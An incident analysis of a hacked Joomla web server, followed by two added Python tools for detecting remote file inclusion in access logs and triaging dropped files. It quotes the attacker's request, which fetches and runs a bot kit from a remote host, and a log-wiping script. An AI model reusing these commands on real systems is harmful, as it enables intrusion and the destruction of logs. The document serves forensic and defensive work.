Text: mech28bot analysis
Author: lockdown (www.lockeddown.net)
Date: July 29, 2006

I was asked to investigate a misbehaving Linux webserver. The following explains how they got in and gives a brief analysis of the tools they left behind.

It seemed the server had been compromised, and I was told one application that was known to be out of date was Joomla. Searching the access logs of the site running Joomla, I see an entry from two days prior:

    200.88.x.x - - [27/Jul/2006:20:54:03] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://example.it/.mn/cmd.txt?&cmd=cd%20/tmp;rm%20-rf%20*;wget%20example.it/.mn/mech.tar;tar%20-xvf%20mech.tar;cd%20httpd;./start.sh;cd%20/tmp;rm%20-rf%20mech.tar;mv%20httpd%20.httpd HTTP/1.1" 200 2248

They used a bug in Joomla to include a file from a third-party site which also appears to have been compromised: the request sets mosConfig_absolute_path, which the component uses to build the path of a file it includes, to a URL, so PHP fetched and executed the remote cmd.txt, and that script in turn ran whatever was passed in the cmd parameter. This is a textbook remote file inclusion. The third-party site is in Italy, but I have changed the name to protect them.

Here is what the above command did, once URL-decoded:

    cd /tmp; rm -rf *; wget example.it/.mn/mech.tar; tar -xvf mech.tar; cd httpd; ./start.sh; cd /tmp; rm -rf mech.tar; mv httpd .httpd

It wipes /tmp, fetches the kit, unpacks it, launches it, deletes the tarball, and finally renames the directory to a dot-name so a casual ls does not show it.

The following files were found in /tmp/.httpd (MD5 sums where given):

    Filename        MD5SUM
    clear.sh
    dc.txt          d1f89d87f61920449467bec16171795a
    f3              919e40cce37adf9eb28efd5f5420376a
    Fl00d.seen
    ftp
    HBC.seen
    httpd           f5b1420933dc0f210a2664e23a58c039
    mech.help
    mech.levels
    mech.pid
    mech.session
    mech.set
    s               4078e8f7ce154dbba1eaeffc83f5f172
    start.sh
    udp.pl          6c456619bac5b534f196cc9a678b4279
    z               7e651f1334dbea3f7aba87f7bc03a8b8

We see that they executed start.sh, so let's see what it contains:

    /#bin/bash
    PATH="."
    httpd
    echo " "

Looks like the first line was mistyped and should have been #!/bin/bash. Without a valid #! line the kernel will not execute the file directly, so the shell that ran the command line falls back to interpreting it as a shell script itself; the bogus first line only produces a "command not found" error and the rest runs. That could cause problems in some cases (a caller that is not a Bourne-style shell, for instance) but not this time.

They set PATH to the current directory, which is /tmp/.httpd, and on the next line they run httpd, which the shell now resolves to ./httpd. The modified PATH is inherited by the processes httpd starts, so if httpd executes any programs without a full path they will be looked up in the current directory rather than in /bin or /usr/bin.

The file httpd is EnergyMech 2.8, a free, open source IRC bot. I don't have the time to determine whether it has been modified, but since it is open source it would be extremely easy for them to customize it. My hunch is that when no arguments are given it reads mech.set to determine what configuration to use. mech.set, mech.session, mech.pid, mech.levels, mech.help and ftp all seem like standard files used by EnergyMech; these include telling it what username to use and what server to join. Fl00d.seen and HBC.seen look like per-channel logs (the names suggest channels called Fl00d and HBC).

clear.sh contains the following:

    #/bin/bash
    rm -rf /var/log/wtmp
    touch /var/log/wtmp
    rm -rf /var/log/secure
    touch /var/log/secure
    echo "Last login & SSH connections logs cleared"

Once again they mistyped the first line. The script then deletes two log files (wtmp, the login history behind last, and secure, where sshd and PAM log on Red Hat-style systems) and puts an empty file back in place of each. They did not escalate privileges beyond those of the web user, so if they tried to run this it would not work: both files are owned by root. Even run as root it would leave a tell, since the recreated files would have a fresh creation time, no history before that moment, and the creator's default ownership and mode rather than the originals'.

dc.txt is a Perl script with the following description: "Data Cha0s connect back backdoor". The first argument of this script is the host to connect back to; the second argument is optional and is the port to connect to. If you don't specify a port it defaults to 80, which makes the outbound connection look like ordinary web traffic to an egress filter. It is a pretty straightforward backdoor that redirects all input, output and errors to the connection and runs /bin/sh, giving the attacker a shell.

f3 - After a very quick look at a dead listing it appears to be a UDP flooder. I would have to spend more time on it to confirm that.

s - After a very quick look at a dead listing it appears to be another flooder. This one appears to use a raw socket.

udp.pl is a small Perl script that floods with UDP packets. It randomizes the size of the packet and the port it uses.

z - After a very quick look at a dead listing it appears to be a TCP-based backdoor. It looks like it listens on port 4000, but this may be configurable. This file isn't as simple as the others, but I don't have the time now to go over it.
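The access-log entry above is the kind of thing a simple log scanner should catch on its own. The following is an added example (not part of the original write-up and not a tool the author used): it parses Common Log Format lines, splits the query string on "&" only (the attacker's ";" is part of the injected command, not a separator), flags any parameter whose value is a remote URL or carries shell metacharacters, and URL-decodes the cmd parameter into the step-per-line form shown above. The sample log is constructed; the first line reproduces the quoted entry with the source address made up and the Italian host anonymised as in the write-up, the second is an ordinary Joomla request for contrast.

```python
"""Added example: flag remote file inclusion (RFI) attempts in Apache access logs."""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample log. Line 1 mirrors the entry quoted in the analysis
# (source address made up, remote host anonymised); line 2 is benign.
SAMPLE_LOG = (
    '200.88.1.2 - - [27/Jul/2006:20:54:03] "GET /administrator/components/'
    'com_peoplebook/param.peoplebook.php?mosConfig_absolute_path='
    'http://example.it/.mn/cmd.txt?&cmd=cd%20/tmp;rm%20-rf%20*;'
    'wget%20example.it/.mn/mech.tar;tar%20-xvf%20mech.tar;cd%20httpd;'
    './start.sh;cd%20/tmp;rm%20-rf%20mech.tar;mv%20httpd%20.httpd HTTP/1.1" '
    '200 2248\n'
    '10.0.0.5 - - [27/Jul/2006:20:55:10] "GET /index.php?option=com_content'
    '&task=view&id=12 HTTP/1.1" 200 9812\n'
)

# Common Log Format without referer/user-agent, as in the quoted entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
SHELL_META = re.compile(r'[;|`$]|&&')


def split_query(target):
    """Return decoded (name, value) pairs. Splits on '&' only: a ';' inside a
    value is the attacker's command separator and must stay in the value."""
    pairs = []
    for part in urlsplit(target).query.split('&'):
        if part:
            name, _, value = part.partition('=')
            pairs.append((unquote(name), unquote(value)))
    return pairs


def analyze(line):
    """Parse one log line into a record with findings; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = split_query(m.group('target'))
    findings = []
    for name, value in params:
        if REMOTE_SCHEME.match(value):
            findings.append(f'remote URL in parameter {name}: {value}')
        if SHELL_META.search(value):
            findings.append(f'shell metacharacters in parameter {name}')
    return {
        'ip': m.group('ip'),
        'time': m.group('ts'),
        'path': urlsplit(m.group('target')).path,
        'status': int(m.group('status')),
        'params': dict(params),
        'findings': findings,
        'suspicious': bool(findings),
    }


def decoded_command(record, param='cmd'):
    """Render the injected command one step per line, like the decoded form above."""
    value = record['params'].get(param, '')
    return '\n'.join(step.strip() for step in value.split(';') if step.strip())


def scan(text):
    """Analyze every line of an access log that parses."""
    return [r for r in (analyze(line) for line in text.splitlines()) if r]


if __name__ == '__main__':
    for rec in scan(SAMPLE_LOG):
        if rec['suspicious']:
            print(f"{rec['ip']} {rec['time']} {rec['path']}")
            for finding in rec['findings']:
                print('  ' + finding)
            print('  decoded command:')
            for step in decoded_command(rec).splitlines():
                print('    ' + step)
```

Run it against a real access_log with scan(open(path).read()); the remote-URL check is the one that matters for RFI, since a legitimate Joomla parameter never carries an http:// value, while the metacharacter check catches the command-injection stage even when the include target has been obfuscated.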
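The file inventory and the two mistyped #! lines above are what a first triage pass over a dropped directory should produce automatically. The following is an added example, not a tool from the original write-up: it walks a directory such as /tmp/.httpd, records size, MD5 (to match the table's convention) and SHA-256 for each file, classifies it from its first bytes, checks whether a script's first line is a valid shebang, and greps scripts for a few tells (PATH rewrites, references to /var/log, connect-back or backdoor keywords). The sample files are constructed stand-ins written to a temporary directory: start.sh and clear.sh contain exactly what the write-up quotes, dc.txt only its shebang and description line, httpd a fake ELF header rather than the real bot, and mech.set an invented placeholder config.

```python
"""Added example: first-pass triage of files dropped in a directory like /tmp/.httpd."""
import hashlib
import os
import re
import tempfile

# Constructed stand-ins for the dropped files (see lead-in); not the real kit.
SAMPLE_FILES = {
    'start.sh': b'/#bin/bash\nPATH="."\nhttpd\necho " "\n',
    'clear.sh': (b'#/bin/bash\nrm -rf /var/log/wtmp\ntouch /var/log/wtmp\n'
                 b'rm -rf /var/log/secure\ntouch /var/log/secure\n'
                 b'echo "Last login & SSH connections logs cleared"\n'),
    'dc.txt': (b'#!/usr/bin/perl\n# Data Cha0s connect back backdoor\n'
               b'# (body omitted: constructed stand-in)\n'),
    'httpd': b'\x7fELF\x01\x01\x01' + b'\x00' * 57,      # fake ELF header only
    'mech.set': b'# placeholder bot config, invented for the example\n',
}

INTERPRETER = re.compile(rb'bin/(ba)?sh|perl|python')
TELLS = {
    'rewrites PATH': re.compile(rb'^\s*(export\s+)?PATH=', re.M),
    'touches system logs': re.compile(rb'/var/log/'),
    'connect-back/backdoor keyword': re.compile(rb'connect\s*back|backdoor', re.I),
}


def classify(data):
    """Return (kind, shebang note). A script whose first line names an
    interpreter but does not start with '#!' is flagged as a malformed shebang."""
    first = data.split(b'\n', 1)[0]
    if data.startswith(b'\x7fELF'):
        return 'ELF binary', None
    if first.startswith(b'#!'):
        return 'script', 'shebang ok: ' + first[2:].strip().decode(errors='replace')
    if INTERPRETER.search(first):
        return 'script', 'malformed shebang: ' + first.decode(errors='replace')
    if all(32 <= b < 127 or b in b'\t\r\n' for b in data[:512]):
        return 'text', None
    return 'unknown binary', None


def triage_file(path):
    """Hash, classify and grep one file; returns a plain dict for reporting."""
    with open(path, 'rb') as fh:
        data = fh.read()
    kind, note = classify(data)
    rec = {
        'name': os.path.basename(path),
        'size': len(data),
        'md5': hashlib.md5(data).hexdigest(),
        'sha256': hashlib.sha256(data).hexdigest(),
        'kind': kind,
        'shebang': note,
        'tells': [],
    }
    if kind in ('script', 'text'):
        rec['tells'] = [name for name, rx in TELLS.items() if rx.search(data)]
    return rec


def triage_dir(directory):
    """Triage every regular file in a directory, skipping symlinks."""
    recs = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path) and not os.path.islink(path):
            recs.append(triage_file(path))
    return recs


def build_sample_dir():
    """Write the constructed sample files to a fresh temporary directory."""
    directory = tempfile.mkdtemp(prefix='httpd-triage-')
    for name, data in SAMPLE_FILES.items():
        with open(os.path.join(directory, name), 'wb') as fh:
            fh.write(data)
    return directory


if __name__ == '__main__':
    for r in triage_dir(build_sample_dir()):
        line = f"{r['name']:12} {r['size']:6d} {r['md5']} {r['kind']}"
        if r['shebang']:
            line += f"  [{r['shebang']}]"
        if r['tells']:
            line += "  tells: " + ', '.join(r['tells'])
        print(line)
```

Point triage_dir at the real directory (after copying it off the host, since reading files in place updates atime on many filesystems) and compare the MD5 column against a table like the one above; the hashes are what let a second analyst confirm they are looking at the same kit.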